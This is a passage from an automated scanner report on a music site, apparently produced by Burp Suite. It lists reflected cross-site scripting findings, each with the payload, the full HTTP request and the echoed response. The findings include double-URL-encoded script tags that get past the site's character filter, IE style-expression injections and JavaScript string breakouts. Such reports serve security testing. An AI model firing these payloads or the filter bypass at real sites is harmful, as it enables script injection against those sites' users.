Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134007


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Greatest Hits...So Fa
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/greatest-hits-so-far?2b739"style="x:expression(alert(1))"0516aff5a34=1" />
...[SNIP]...

2.115. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b002'%3b2512425bfef was submitted in the REST URL parameter 1. This input was echoed as 7b002';2512425bfef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7b002'%3b2512425bfef/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7b002';2512425bfef';
   s.prop4 = 'p-nk';
   s.prop5 = 'raise-your-glass';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.116. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8 was submitted in the REST URL parameter 1. This input was echoed as 5901a"><script>alert(1)</script>d5cb7aa2bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88325


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5901a"><script>alert(1)</script>d5cb7aa2bc8/p-nk/raise-your-glass" />
...[SNIP]...

2.117. http://bigpondmusic.com/album/p-nk/raise-your-glass [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 was submitted in the h parameter. This input was echoed as f36a9"style="x:expression(alert(1))"6ca781435e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?h=756314040f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?h=756314040f36a9"style="x:expression(alert(1))"6ca781435e0" />
...[SNIP]...

2.118. http://bigpondmusic.com/album/p-nk/raise-your-glass [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9c4d"style="x:expression(alert(1))"397b8c9825e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?b9c4d"style="x:expression(alert(1))"397b8c9825e=1" />
...[SNIP]...

2.119. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3 was submitted in the REST URL parameter 1. This input was echoed as c0385"><script>alert(1)</script>3e0a93acac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc0385"><script>alert(1)</script>3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2" />
...[SNIP]...

2.120. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4292b'%3b33844f2483 was submitted in the REST URL parameter 1. This input was echoed as 4292b';33844f2483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4292b'%3b33844f2483/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4292b';33844f2483';
   s.prop4 = 'paul-kelly';
   s.prop5 = 'paul-kellys-greatest-hits-songs-from-the-south-volume-1-2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.h
...[SNIP]...

2.121. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 was submitted in the h parameter. This input was echoed as e427a"style="x:expression(alert(1))"fe0616ca712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 155057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style="x:expression(alert(1))"fe0616ca712" />
...[SNIP]...

2.122. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d82"style%3d"x%3aexpression(alert(1))"e1280da1058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60d82"style="x:expression(alert(1))"e1280da1058 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style%3d"x%3aexpression(alert(1))"e1280da1058=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154937


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Paul Kelly - Paul Kelly's Gr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style="x:expression(alert(1))"e1280da1058=1" />
...[SNIP]...

2.123. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f was submitted in the REST URL parameter 1. This input was echoed as fc80e"><script>alert(1)</script>52b1405e7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88042


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfc80e"><script>alert(1)</script>52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000" />
...[SNIP]...

2.124. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9c1'%3b630504def5d was submitted in the REST URL parameter 1. This input was echoed as aa9c1';630504def5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumaa9c1'%3b630504def5d/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumaa9c1';630504def5d';
   s.prop4 = 'powderfinger';
   s.prop5 = 'fingerprints-the-best-of-powderfinger-1994-2000';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.
...[SNIP]...

2.125. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a6a7"style="x:expression(alert(1))"e1cd885fe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
